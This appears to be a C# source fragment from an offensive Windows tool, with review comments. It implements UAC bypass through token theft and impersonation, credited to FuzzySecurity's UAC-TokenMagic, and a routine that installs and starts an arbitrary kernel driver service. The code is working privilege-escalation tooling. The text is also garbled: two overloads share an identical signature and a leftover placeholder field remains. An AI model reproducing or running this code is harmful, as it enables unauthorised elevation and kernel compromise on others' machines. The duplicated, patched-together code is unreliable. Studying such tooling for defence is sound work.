////////////////////////////////////////////////////////////////////////////////
// Token-handle variant: the caller already holds a primary token, which is
// stored straight into phNewToken; no process lookup happens here.
////////////////////////////////////////////////////////////////////////////////
public Boolean BypassUAC(IntPtr htoken, String command)
{
    phNewToken = htoken;

    if (!SetTokenInformation())
    {
        return (false);
    }

    Boolean launched = false;
    if (ImpersonateUser())
    {
        // The first space-delimited token is treated as the executable and the
        // rest is re-joined as the argument string.
        // NOTE(review): this is a plain split on ' ', so a quoted executable
        // path that contains spaces is torn apart, and runs of spaces inside
        // the argument tail collapse to a single space.
        String exe = command;
        String args = String.Empty;
        if (exe.Contains(' '))
        {
            String[] parts = exe.Split(new[] { ' ' }, StringSplitOptions.RemoveEmptyEntries);
            exe = parts.First();
            args = String.Join(" ", parts.Skip(1).ToArray());
        }
        launched = CreateProcess.CreateProcessWithLogonW(phNewToken, exe, args);
    }

    // Once SetTokenInformation has succeeded the thread is always reverted,
    // whether impersonation or the launch failed.
    advapi32.RevertToSelf();
    return (launched);
}
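////////////////////////////////////////////////////////////////////////////////
//https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1
////////////////////////////////////////////////////////////////////////////////
// Steals the primary token of `processId`, impersonates it and launches
// `command` (no separate argument string) through CreateProcessWithLogonW.
// Each step is now gated on the previous one: the original ignored every
// return value, so a failed GetPrimaryToken/SetTokenInformation/ImpersonateUser
// still reached CreateProcessWithLogonW with whatever phNewToken held, and the
// thread was never reverted after ImpersonateUser.
// Assumes the helpers report success as Boolean, as the other BypassUAC
// overloads in this file rely on.
private static readonly String _unused_marker_not_needed = null; // placeholder removed below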
////////////////////////////////////////////////////////////////////////////////
//https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1
////////////////////////////////////////////////////////////////////////////////
public Boolean BypassUAC(Int32 processId, String command)
{
    // Acquire and adjust the target's primary token; either failure bails out
    // before any impersonation has been attempted, so nothing to revert.
    if (!GetPrimaryToken((UInt32)processId) || !SetTokenInformation())
    {
        return (false);
    }

    // Impersonate, then launch `command` with an empty argument string.
    Boolean started = ImpersonateUser()
        && CreateProcess.CreateProcessWithLogonW(phNewToken, command, "");

    // Reverted exactly once from here on, regardless of which step failed.
    advapi32.RevertToSelf();
    return (started);
}
////////////////////////////////////////////////////////////////////////////////
//https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1
////////////////////////////////////////////////////////////////////////////////
public Boolean BypassUAC(Int32 processId, String command)
{
    // Token acquisition and adjustment must both succeed before impersonating;
    // failing here means no impersonation happened, so no RevertToSelf.
    if (!GetPrimaryToken((UInt32)processId) || !SetTokenInformation())
    {
        return (false);
    }

    Boolean started = false;
    if (ImpersonateUser())
    {
        // FindExe separates the executable from its argument tail (command is
        // rewritten in place, arguments comes back via the out parameter).
        String arguments;
        FindExe(ref command, out arguments);
        started = CreateProcess.CreateProcessWithLogonW(phNewToken, command, arguments);
    }

    // Always revert once impersonation has been attempted.
    advapi32.RevertToSelf();
    return (started);
}
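////////////////////////////////////////////////////////////////////////////////
// sc create TokenDriver binPath="C:\Windows\System32\kerneltokens.sys" type=kernel
////////////////////////////////////////////////////////////////////////////////
// Creates (if needed) and starts a kernel-mode driver service through the
// local service control manager. Parameters are read from cLP:
//   ServiceName - service to open or create (default "TokenDriver")
//   Path        - driver binary; resolved with Path.GetFullPath, falling back
//                 to CreateProcess.FindFilePath when GetFullPath rejects it
//   Force       - presence alone enables overwriting an existing driver entry
// Loading a user-supplied .sys is the purpose of this command; the only check
// made here is that the resolved file exists.
private static void _InstallDriver(CommandLineParsing cLP)
{
    string serviceName = "TokenDriver";
    string sn;
    if (cLP.GetData("ServiceName", out sn))
    {
        serviceName = sn;
    }

    string path = string.Empty;
    string p;
    if (cLP.GetData("Path", out p))
    {
        path = p;
    }

    // Only the presence of "Force" matters; its value is never inspected.
    bool overwrite = false;
    object f;
    if (cLP.GetData("Force", out f))
    {
        overwrite = true;
    }

    Console.WriteLine("[*] Service Name: " + serviceName);
    Console.WriteLine("[*] Service Path: " + path);

    PSExec psexec = new PSExec(serviceName);
    if (!psexec.Connect("."))
    {
        Console.WriteLine("[-] Unable to connect to service controller");
        return;
    }

    string filename;
    try
    {
        filename = Path.GetFullPath(path);
    }
    catch (ArgumentException)
    {
        // GetFullPath rejects empty strings and invalid characters (also
        // ArgumentNullException, which derives from ArgumentException); fall
        // back to a file search for a bare binary name.
        filename = CreateProcess.FindFilePath(path);
        if (string.IsNullOrEmpty(filename))
        {
            Console.WriteLine("[-] Unable to locate service binary");
            return;
        }
    }
    catch (Exception ex)
    {
        // Previously any other exception (PathTooLong, NotSupported, Security)
        // returned silently with no output at all.
        Console.WriteLine("[-] Unable to resolve service path: " + ex.Message);
        return;
    }
    Console.WriteLine("[*] Full Path: " + filename);

    if (!File.Exists(filename))
    {
        // Was "...: {0}" with no format argument, which printed the literal "{0}".
        Console.WriteLine("[-] Unable to find service binary: " + filename);
        return;
    }

    // NOTE(review): if Open() succeeds the service already exists and is
    // started as-is; `overwrite` is only consulted on the create path, so
    // Force does not replace an existing service's binary path.
    if (!psexec.Open())
    {
        if (!psexec.CreateDriver(filename, overwrite))
        {
            return;
        }
        if (!psexec.Open())
        {
            return;
        }
    }

    if (!psexec.Start())
    {
        return;
    }
}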